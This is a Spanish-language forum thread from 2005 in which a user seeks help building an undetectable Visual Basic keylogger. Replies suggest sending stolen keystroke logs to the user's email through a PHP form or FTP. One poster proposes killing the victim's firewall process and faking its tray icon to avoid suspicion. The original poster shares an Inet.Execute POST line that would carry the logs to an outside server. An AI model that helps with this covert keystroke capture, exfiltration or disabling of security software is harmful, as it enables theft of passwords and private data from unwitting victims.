Keylogger con Http Tunneling!

Iniciado por A2Corp, 29 Agosto 2005, 18:55 PM

0 Miembros y 1 Visitante están viendo este tema.

A2Corp

Hola...  quiero empezar el proyecto de un keylogger hecho en Vb que sea kasi indetectable, por lo menos que si sea indetectable por antivirus y firewall...
Lo primero del antivirus kedo resuelto, pues por ser en Vb es facil hacerlo indetectable, pero lo del firewall me es imposible!!!!!

Pke ala hora de que mi keylogger manda el log a mi mail salta el firewall, el proceso se llama msimn.exe, jeje, lo trate de disimular un poko, pero no todos kaen!.

Eh escuchado un poko de Http tunneling, no se muy bien que es, segun tengo ententido es usar el iexplore, o el programa determinado para navegar para mandar o conectarse con alguna pc...

recuerdo de un programa que se llamaba "FIREHOLE" de una compañia de firewalls que usaba http tunneling para mandar un mensajito a otra pc, y esto era para que se dieran cuenta que por ahi se podia filtrar informacion.

Entonces... por medio de Http tunneling puedo mandar mis logs a mi mail?
Algo como usar al internet explorer para que se conecte con el servidor smtp y me lo mande? Lo kreen posible?????????????
Karay! no se me ocurre nada, no se ni por donde empezar!.

Si akaso saben algo de esto por favor les pido que me lo digan, links, comentarios, todo es buenoOo! Pofas! jejejeje.

Hackeo, luego existo...

yeikos

Por mis experiencias los keyloggers en VB son pésimos, si escribes muy rápido el keylogger no es capaz de capturar todas las teclas y claro, esto supone una ruina.

programatrix

Prueva php. Rellenas un formulario web con tus datos y lo manda. Con el propio control de internet transfer control  ::)

yeikos

Las librerias del control Internet Transfer Control no mucha gente las tiene así que yo obtaria otros caminos (ftp del command).

Numeros

#4
Citarala hora de que mi keylogger manda el log a mi mail salta el firewall

Ante todo debo decir que estoy pensando en teoría y en voz alta.
Si el problema es un firewall X, lo mejor sería neutralizarlo, matar su proceso. Hacer una aplicacion que cuando sea bloqueda por el firewall se le vire cual serpiente y le pegue una mordida mortal. Arriba, que no se diga, que hay varios post por ahi de como se mata un proceso.
Otra cosa, se me ocurre que luego de haber neutralizado el firewall le suplantemos con su propio icon en la bandeja del sistema, de esta forma a lo mejor no levantamos sospechas. O mejor, no eliminarlo completamente, pero si ponerlo Off al antojo mientras necesitemos comunicarnos y luego On otra vez. De todas maneras soy del criterio que siempre hay que experimentar y probar, con las gama de firewall.

Saludos

A2Corp

muchas gracias por sus respuestas!... ha decir verdad prefiero el metodo que menciono reydelmundo, ya que eso es exactamente lo que estaba buscandoOo!. se me hace muy buena idea esa de filtrar el mensaje por medio del ie, ya que kasi todas las pc's tiene este proceso abierto a los firewalls y se me hace mas lioso tener que hacer otra aplicacion para matar el proceso del firewall :S no lo veo 100% seguro.   :(, pero weno, muchas gracias!!!!

ahora, si tienen info sobre estos temas plz posteenla :D aki estoy para lo que necesiten! ^^
Hackeo, luego existo...

A2Corp

Casi completoOo! jejeje.
Esto es lo que llevo hasta el momento.

Subi una pagina .php en un servidor, bla bla bla, con solo meter algo de info y darle click la manda a mi mail, con la ip de la makina desde donde se mando.
Ok!... pero como hago para que el keylogger se meta a esa pagina y postee el log??????

el log se guarda en un textbox, y segun tengo entendido con el control inet se puede (GRACIAS A REYDELMUNDO que ME ABRIO LOS OJOS).

es algo asi, no?

Inet1.Execute [URL], [OPERATION], [INPUT Data], [Input headers]

que en mi kaso seria algo asi...
Inet.Execute "www.miurl.com/mail.php", "POST", [INPUT Data], [Input headers]

como pueden ver tengo dudas en las dos ultimas.
que es input data e input headers?
input data es la info que pienso postear no?
pero... que le pongo?
"mail_body= text1 " ???? y que pongo en input headers... Waaaaaa! no entiendo estoOo! y kreo que me falta muy muy muy poko para lograr terminar el keylogger, les pido por favor alguna pista, algo kon lo que me puedan ayudar porfaaaaaaas!!!!!!!!!!!!!!!!! :-[
Hackeo, luego existo...